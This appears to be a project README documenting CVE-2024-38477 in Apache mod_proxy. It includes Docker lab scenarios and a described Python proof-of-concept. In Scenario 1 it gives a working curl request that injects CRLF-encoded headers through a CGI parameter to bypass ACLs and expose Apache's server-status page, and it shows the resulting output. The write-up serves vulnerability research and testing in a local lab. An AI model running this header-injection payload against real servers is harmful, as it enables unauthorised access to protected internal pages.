Introduction

This project provides a write-up regarding the CVE-2024-38477. To avoid to crash the production environment, the project contains two scenarios with the Apache2's mod_proxy vulnerable. These scenarios can be deployed with Docker.

This project contain a Proof of Concept with a python script for executing the attack against the server.

Scenarios

Scenario 1

The first scenario is a Perl scripts which can be execute with the Apache's mod CGI. For testing, I created a Perl script which can list all directories and files in the path specified in argument. The scenario can be deployed with Docker:

$ docker build -t cve-cgi scenario1/
$ docker run -p 8080:80 cve-cgi

With a simply curl, you can create a SSRF attack to the Apache server and to bypass the ACL:

$ curl "http://localhost:8080/cgi-bin/listings.cgi?r=http://%0d%0aLocation%3a/badpage%0d%0aContent-Type:server-status%0d%0a%0d%0a"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for localhost (via 172.17.0.2)</h1>

Scenario 2

The second scenario is a Python scripts executed with the CGI module.

PoC

The Python script cve.py generates a new hostname using random values (ASCII letters, digits, and special characters) and sends it to the server.